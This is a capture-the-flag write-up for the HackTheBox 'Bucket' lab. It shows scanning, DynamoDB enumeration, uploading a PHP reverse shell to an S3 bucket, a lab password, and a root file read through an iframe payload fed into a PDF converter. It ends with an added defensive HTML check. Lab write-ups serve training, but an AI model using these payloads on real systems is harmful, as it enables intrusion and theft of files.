HackTheBox-Bucket
Rustscan
rustscan -a 10.10.10.212 -- -A -sC -sV
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.10.212:22
Open 10.10.10.212:80
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://bucket.htb/
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 2.6.32 (94%), ASUS RT-N56U WAP
(Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.9 (92%)
No exact OS matches for host (test conditions non-ideal).
PORT 80
It's using a domain name so we are going to add that to /etc/hosts
Notice that we don't see images. The reason is that the page is retrieving them from s3.bucket.htb
Running dirsearch against that
If we visit s3.bucket.htb/shell
But adding / makes a difference
s3.bucket.htb/shell/
Reading the documentation to list tables
var params = {};
dynamodb.listTables(params, function(err, data) {
  if (err) console.log(err, err.stack); // an error occurred
  else console.log(data);               // successful response
});
We have found a table named users. To view the data from the table
var params = {
  TableName: "users"
};
docClient.scan(params, (error, result) => {
  if (error) {
    console.log('error', error);
  } else {
    console.log(result.Items); // x items
  }
});
Tried using these credentials through ssh but failed
Also, running wfuzz on http://s3.bucket.htb/shell/ didn't return anything interesting
So after spending so much time I realized that I could also list the tables using the AWS CLI
We needed to set up the credentials and the region first. Also note that our endpoint URL will be http://s3.bucket.htb
We can view the tables from here as well
Honestly did not know what I was doing until I ran aws s3 ls again
Here we can see index.html. If we visit s3.bucket.htb/adserver/index.html, it will be the same as bucket.htb
So this means that if we upload a PHP reverse shell to the bucket, which is adserver, we can access it from bucket.htb
The reverse shell is uploaded. Also keep in mind to access it quickly, because the S3 bucket is going to remove it
We can switch user to roy with the password n2vM-<_K_Q:.Aa2
Also, if we look for open ports, we find that port 8000 is running HTTP, so we can do port forwarding with chisel
On our machine
On target machine
We can also find bucket-app in /var/www
Looking at index.php, it's using the DynamoDB client to iterate over the contents of the alerts table, then reading them and storing them to a PDF using pd4ml, which converts HTML and CSS to PDF
So we need to create a table first
aws dynamodb create-table \
    --table-name alerts \
    --attribute-definitions \
        AttributeName=title,AttributeType=S \
        AttributeName=data,AttributeType=S \
    --key-schema \
        AttributeName=title,KeyType=HASH \
        AttributeName=data,KeyType=RANGE \
    --provisioned-throughput \
        ReadCapacityUnits=10,WriteCapacityUnits=5 \
    --endpoint-url 'http://s3.bucket.htb'
Now we need to insert the data
aws dynamodb put-item \
--table-name alerts \
--item '{
"title": {"S": "Ransomware"},
"data": {"S": "<html><head></head><body><iframe src='/root/root.txt'></iframe></body></html>"}
}' \
--return-consumed-capacity TOTAL --endpoint-url http://s3.bucket.htb
Now doing a POST request with action=get_alerts
curl --data "action=get_alerts" -X POST http://127.0.0.1:8000
Note: The converted PDF file will get removed, and so will the table, so you need to be quick here to get the file
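As a defensive counterpart to the steps above, this added example (not from the original writeup and not bucket-app's code) checks an alert item's HTML before it is handed to an HTML-to-PDF converter, rejecting embedding tags and any resource reference that is not an https URL on an allowlisted host. The tag list, the attribute list and the host static.example.test are assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Policy values below are assumptions for this sketch, not taken from bucket-app.
EMBED_TAGS = {"iframe", "frame", "object", "embed"}
URL_ATTRS = {"src", "href", "data", "background", "poster"}
ALLOWED_HOSTS = {"static.example.test"}  # hypothetical asset host


def is_allowed_url(value):
    """Allow only absolute https URLs on an allowlisted host."""
    try:
        parts = urlsplit(value.strip())
    except ValueError:
        return False
    return parts.scheme == "https" and parts.hostname in ALLOWED_HOSTS


class RefCollector(HTMLParser):
    """Records every tag or attribute that would make the renderer load a resource."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in EMBED_TAGS:
            self.findings.append((tag, "embedding tag"))
        for name, value in attrs:
            if name in URL_ATTRS and not is_allowed_url(value or ""):
                self.findings.append((tag, f"{name}={value}"))


def check_alert(item):
    """Return findings for one DynamoDB-style item; an empty list means safe to render."""
    collector = RefCollector()
    collector.feed(item["data"]["S"])
    collector.close()
    return collector.findings


# Constructed samples: the first mirrors the item stored above, the second is benign.
PAGE_ITEM = {"title": {"S": "Ransomware"},
             "data": {"S": "<html><head></head><body><iframe src=/root/root.txt></iframe></body></html>"}}
BENIGN_ITEM = {"title": {"S": "Disk usage"},
               "data": {"S": '<html><body><h1>Disk 91% full</h1><img src="https://static.example.test/logo.png"></body></html>'}}

if __name__ == "__main__":
    for item in (PAGE_ITEM, BENIGN_ITEM):
        print(item["title"]["S"], check_alert(item) or "ok")
```

A check like this complements running the converter as an unprivileged user, so that a reference that slips through cannot reach files such as those under /root.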
I started a python http server
And we got the root flag. I was able to get the private SSH key but couldn't get it into a proper format, so I just left with a root hash